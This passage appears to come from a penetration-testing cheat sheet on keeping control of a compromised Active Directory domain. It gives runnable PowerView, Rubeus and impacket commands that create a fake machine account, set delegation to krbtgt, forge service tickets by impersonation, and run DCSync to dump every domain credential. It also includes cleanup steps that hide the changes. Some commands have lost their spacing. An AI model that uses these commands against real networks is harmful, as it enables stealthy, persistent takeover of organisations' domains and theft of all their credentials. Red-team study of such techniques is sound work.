Now you can add yourself (the "snovvcrash" user) to the Domain Admins group any time and do stuff (actually adding the user to Domain Admins every time is not necessary, as the AdminCount attribute will stay 1 anyways after adding the backdoor user to a protected group for the first time):
When DA is owned (or any other account with DS-Install-Replica permission), you can create a fake machine account (or use an existing real machine account), set SERVER_TRUST_ACCOUNT bit for it and perform DCSync on behalf of this account to regain domain dominance.
# create a new service account (or abuse an existing one)PM >New-MachineAccount-Domain megacorp.local -DomainController DC01.megacorp.local -MachineAccount FakeMachine -Password $(ConvertTo-SecureString'Passw0rd1!'-AsPlainText -Force) -Verbose# set UAC to be 'WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION'PV3 >Set-DomainObject"CN=FakeMachine,CN=Computers,DC=megacorp,DC=local"-Set @{useraccountcontrol=16781312} -Verbose# set the krbtgt SPN for delegationPV3 >Set-DomainObject"CN=FakeMachine,CN=Computers,DC=megacorp,DC=local"-Set @{"msDS-AllowedToDelegateTo"=@("krbtgt/MEGACORP")} -Verbose# request TGS via S4U (will act as a TGT of the impersonated user)PS > .\Rubeus.exe s4u /domain:megacorp.net /user:FakeMachine$ /rc4:b2bdbe60565b677dfb133866722317fd /impersonateuser:snovvcrash /msdsspn:krbtgt/MEGACORP /ptt# cleanup: remove the SPN for delegationPV3 >Set-DomainObject"CN=FakeMachine,CN=Computers,DC=megacorp,DC=local"-Clear msDS-AllowedToDelegateTo -Verbose# cleanup: back to UAC 'WORKSTATION_TRUST_ACCOUNT'PV3 >Set-DomainObject"CN=FakeMachine,CN=Computers,DC=megacorp,DC=local"-Set @{useraccountcontrol=4096} -Verbose
# create a new service account (or abuse an existing one)$addcomputer.py-computer-namePersist1-computer-pass'Passw0rd1!'-dc-ip192.168.1.11megacorp.local/lowpriv:'Passw0rd2!'# set UAC to be' WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION' and set the krbtgt SPN for delegation$python3setCD.pymegacorp.local/administrator:'Passw0rd3!'-dc-ip192.168.1.11-target'Persist1$'-spnkrbtgt/MEGACORP# request TGS via S4U (will act as a TGT of the impersonated user)$getST.py-spnkrbtgt/MEGACORPmegacorp.local/'Persist1$:Passw0rd1!'-dc-ip192.168.1.11-impersonate'DC01$'# fire DCSync$KRB5CCNAME=`pwd`/'DC01$.ccache'secretsdump.pyDC01.megacorp.local-dc-ip192.168.1.11-k-no-pass-just-dc